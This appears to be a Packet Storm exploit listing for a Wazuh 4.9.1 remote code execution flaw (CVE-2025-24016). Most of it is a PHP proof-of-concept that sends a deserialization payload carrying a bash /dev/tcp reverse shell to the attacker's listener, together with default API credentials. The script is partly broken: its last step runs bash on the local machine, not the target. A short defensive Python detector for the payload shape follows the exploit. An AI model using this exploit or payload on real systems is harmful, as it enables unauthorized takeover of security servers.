Wazuh 4.9.1 Remote Code Execution

06 Mar 2025 00:00:00 | Reported by indoushka | Type: packetstorm | Source: packetstorm.news | 312 views

Wazuh 4.9.1 PHP code injection allows remote code execution via malicious payloads.

Code
    =============================================================================================================================================
    | # Title     : Wazuh v 4.9.1 PHP Code Injection Vulnerability                                                                              |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://wazuh.com/                                                                                                          |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking in Google or other search engines.
    
    [+] Code Description:
    
       This PHP script exploits the Remote Code Execution (RCE) vulnerability in the Wazuh server.
       It sends a request to the target server with a special payload that opens a reverse shell back to the local listener.
     
    [+] Save the code as poc.php.
    
    [+] Usage : php poc.php -u https://<worker-server>:55000/security/user/authenticate/run_as -i 192.168.1.10 -p 4444
    
    [+] PayLoad :
    
    <?php
    
    // Enable error logging
    ini_set('log_errors', 1);
    ini_set('error_log', 'php_errors.log');
    date_default_timezone_set('UTC');
    
    // Helper for coloured terminal output
    function color_print($text, $color = null) {
        switch ($color) {
            case 'error':
                return "\033[1;31m$text\033[0m"; // red
            case 'warning':
                return "\033[1;33m$text\033[0m"; // yellow
            case 'success':
                return "\033[1;32m$text\033[0m"; // green
            case 'info':
                return "\033[1;36m$text\033[0m"; // blue
            default:
                return $text;
        }
    }
    
    // Version check
    function version_check() {
        try {
            $req_version = phpversion(); // PHP version
            $pyfiglet_version = '2.5.0'; // default (adjust to your version)
            echo "الإصدارات الحالية:\n";
            echo "PHP: $req_version\n";
            echo "PyFiglet: $pyfiglet_version\n";
        } catch (Exception $e) {
            echo "فشل التحقق من الإصدار: " . $e->getMessage() . "\n";
        }
    }
    
    // Validate the IP address
    function check_ip($ip) {
        if (filter_var($ip, FILTER_VALIDATE_IP)) {
            return true;
        } else {
            echo color_print("IP غير صالح: $ip", 'error') . "\n";
            return false;
        }
    }
    
    // Validate the port
    function check_port($port) {
        if (is_numeric($port) && $port > 0 && $port <= 65535) {
            return true;
        } else {
            echo color_print("Port غير صالح: $port", 'error') . "\n";
            return false;
        }
    }
    
    // Validate the URL
    function check_url($url) {
        if (filter_var($url, FILTER_VALIDATE_URL)) {
            return true;
        } else {
            echo color_print("URL غير صالح. تأكد من أنه يبدأ بـ http:// أو https://", 'error') . "\n";
            return false;
        }
    }
    
    // Parse command-line arguments.
    // Long options (--user, --pass) must be passed in getopt's second
    // argument; they are not part of the short-option string.
    function parse_args() {
        $args = getopt('u:i:p:c::n::', ['user::', 'pass::']);
        return $args;
    }
    
    function main() {
        $args = parse_args();
    
        // Validate the inputs
        if (!isset($args['u']) || !isset($args['i']) || !isset($args['p'])) {
            echo color_print("يجب تحديد URL و IP و Port!", 'error') . "\n";
            exit(1);
        }
    
        if (!check_ip($args['i']) || !check_port($args['p']) || !check_url($args['u'])) {
            exit(1);
        }
    
        version_check();
    
        echo "Wazuh RCE - CVE-2025-24016\n";
        echo "لأغراض البحث والاختبار فقط!\n";
        echo "الاستخدام غير المصرح به محظور.\n";
        echo "بواسطة: Jessie\n";
        echo "الائتمان: Aiman، Cahyo، Ihsan و Arch \n";
    
        // Build the payload
        $payload = [
            "__unhandled_exc__" => [
                "__class__" => "os.system",
                "__args__" => [
                    "bash -i >& /dev/tcp/{$args['i']}/{$args['p']} 0>&1"
                ]
            ]
        ];
    
        $headers = [
            "Content-Type: application/json",
            "X-Header-Name: Custom-Header"
        ];
    
        // Authentication credentials
        $username = $args['user'] ?? 'wazuh-wui';
        $password = $args['pass'] ?? 'MyS3cr37P450r.*-';
    
        // Send the POST request
        $url = $args['u'];
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload));
        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
        curl_setopt($ch, CURLOPT_USERPWD, "$username:$password");
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_TIMEOUT, 10);
        $response = curl_exec($ch);
        $status_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
    
        if ($status_code != 200) {
            echo color_print("رمز حالة الاستجابة: $status_code", 'error') . "\n";
            if (strpos($response, 'Unauthorized') !== false) {
                echo color_print("فشل المصادقة", 'error') . "\n";
            } else {
                echo color_print("استجابة غير طبيعية: $response", 'error') . "\n";
            }
            exit(1);
        }
    
        echo color_print("تمت المصادقة بنجاح!", 'success') . "\n";
        echo "الاستجابة: " . color_print($response, 'info') . "\n";
    
        // Reverse shell
        echo color_print("تم إنشاء الاتصال بالشل العكسي إلى {$args['i']}:{$args['p']}", 'info') . "\n";
        sleep(5); // simulate the connection
    
        // Note: this runs bash on the local host running poc.php, not on the target.
        $command = "bash -i";
        $reverse_shell = shell_exec($command);
        if ($reverse_shell === null) {
            echo color_print("فشل الشل العكسي", 'error') . "\n";
        } else {
            echo color_print("تم الاتصال بالشل العكسي بنجاح!", 'success') . "\n";
        }
    }
    
    main();
    
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================
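The PoC above sends a JSON body whose only distinguishing feature is the `__unhandled_exc__` object carrying `__class__` and `__args__`. As an added defensive example (not part of the original advisory or of Wazuh's code), the Python below walks a decoded request body and flags that key shape at any depth, the kind of check a reverse proxy, WAF rule or API access-log review could apply. The sample bodies are constructed, not captured traffic.

```python
import json
from typing import Any, Dict, List, Optional

GADGET_KEY = "__unhandled_exc__"

# Constructed sample bodies: [0] and [3] mirror the PoC payload shape,
# [1] is a benign login body, [2] uses the key name without the object shape.
SAMPLE_BODIES = [
    '{"__unhandled_exc__": {"__class__": "os.system", '
    '"__args__": ["bash -i >& /dev/tcp/192.168.1.10/4444 0>&1"]}}',
    '{"user": "wazuh-wui", "password": "[REDACTED]"}',
    '{"filters": {"__unhandled_exc__": "not-a-dict"}}',
    '{"nested": {"deep": {"__unhandled_exc__": '
    '{"__class__": "subprocess.Popen", "__args__": [["id"]]}}}}',
]


def find_gadgets(node: Any, path: str = "$") -> List[Dict[str, Any]]:
    """Recursively collect every object of the form
    __unhandled_exc__ -> {"__class__": ..., "__args__": ...}."""
    hits: List[Dict[str, Any]] = []
    if isinstance(node, dict):
        inner = node.get(GADGET_KEY)
        if isinstance(inner, dict) and "__class__" in inner:
            hits.append({
                "path": f"{path}.{GADGET_KEY}",
                "class": inner.get("__class__"),
                "args": inner.get("__args__"),
            })
        for key, value in node.items():           # keep descending
            hits.extend(find_gadgets(value, f"{path}.{key}"))
    elif isinstance(node, list):
        for idx, value in enumerate(node):
            hits.extend(find_gadgets(value, f"{path}[{idx}]"))
    return hits


def inspect_body(raw: str) -> Optional[Dict[str, Any]]:
    """Return a finding for a JSON body containing the gadget shape,
    None for benign or non-JSON bodies (those are left to other checks)."""
    try:
        doc = json.loads(raw)
    except ValueError:
        return None
    hits = find_gadgets(doc)
    return {"severity": "critical", "hits": hits} if hits else None


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print("ALERT" if inspect_body(body) else "ok   ", body[:60])
```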

Scores (current as of 06 Mar 2025 00:00):
Risk: 8.3 (High)
Vulners AI Score: 8.3
CVSS 3.1: 9.9
EPSS: 0.93512
Views: 312